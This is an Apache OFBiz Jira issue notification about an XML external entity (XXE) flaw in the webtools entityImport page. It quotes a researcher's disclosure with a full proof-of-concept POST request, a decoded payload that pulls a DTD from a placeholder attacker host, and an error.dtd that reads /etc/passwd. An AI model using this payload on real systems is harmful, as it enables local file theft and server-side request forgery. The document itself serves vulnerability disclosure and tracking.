[
https://issues.apache.org/jira/browse/OFBIZ-11195?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16929734#comment-16929734
]
Jacques Le Roux commented on OFBIZ-11195:
-----------------------------------------
This is only a minor risk as long as OFBiz suffers from CRSF. So I make it
dependend on OFBIZ-10427 and will close it as wont'fix when OFBIZ-10427 will de
done.
> XML Entity Injection in webtools/control/entityImport
> ------------------------------------------------------
>
> Key: OFBIZ-11195
> URL: https://issues.apache.org/jira/browse/OFBIZ-11195
> Project: OFBiz
> Issue Type: Sub-task
> Components: framework/webtools
> Affects Versions: Trunk
> Reporter: Jacques Le Roux
> Priority: Major
>
> This was reported to the OFBiz security team by Jason Nordenstam from
> offensive-security.com. We did not consider it as a real security issue
> because it requires authentication.
> {quote}
> Authenticated users can import XML documents containing DTDs. The SAX parser
> used by the XML Data Import functionality does not have DTD parsing
> explicitly disabled which makes it vulnerable to XXE attacks.
> The results of the import are not displayed in the page which means an
> 'error-based' approach is needed to read local files. The parser will also
> resolve external entities so this vulnerability can also be used for internal
> port scanning or server-side request forgery.
> Affected URL:
> /webtools/control/entityImport
> POC Example Request:
> POST /webtools/control/entityImport HTTP/1.1
> Host:<host>
> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
> Firefox/60.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Referer: <host>/webtools/control/entityImport
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 312
> Cookie: JSESSIONID=66A4289C95C78E5E7977EFF796A7D05B.jvm1; OFBiz.Visitor=10178
> Connection: close
> Upgrade-Insecure-Requests: 1
> fulltext=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0D%0A%3C%21DOCTYPE+notfound+%5B%0D%0A+%3C%21ENTITY+%25+base+SYSTEM+%22http%3A%2F%2F<attacker_ip>%2Ferror.dtd%22%3E%0D%0A+%25base%3B%0D%0A+%25param1%3B+%0D%0A+%25external%3B%0D%0A%5D%3E%0D%0A%3Croot%3E%3Cfoo%3Ebar%3C%2Fbar%3E%3C%2Froot%3E%0D%0A
> Payload One Decoded:
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE notfound [
> <!ENTITY % base SYSTEM "http://<attacker_ip>/error.dtd">
> %base;
> %param1;
> %external;
> ]>
> <root><foo>bar</bar></root>
> error.dtd on Attacking Machine:
> <!ENTITY % payload SYSTEM "file:///etc/passwd">
> <!ENTITY % param1 "<!ENTITY % external SYSTEM 'file:///banana/%payload;'>" >
> {quote}
> We have reproduced it at
> [https://demo-stable.ofbiz.apache.org/webtools/control/entityImport]
> using :
> {code:xml}
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE notfound [
> <!ENTITY % base SYSTEM
> "https://demo-trunk.ofbiz.apache.org/images/error.dtd";>
> %base;
> %param1;
> %external;
> ]>
> <root><foo>bar</bar></root>
> {code}
--
This message was sent by Atlassian Jira
(v8.3.2#803003)
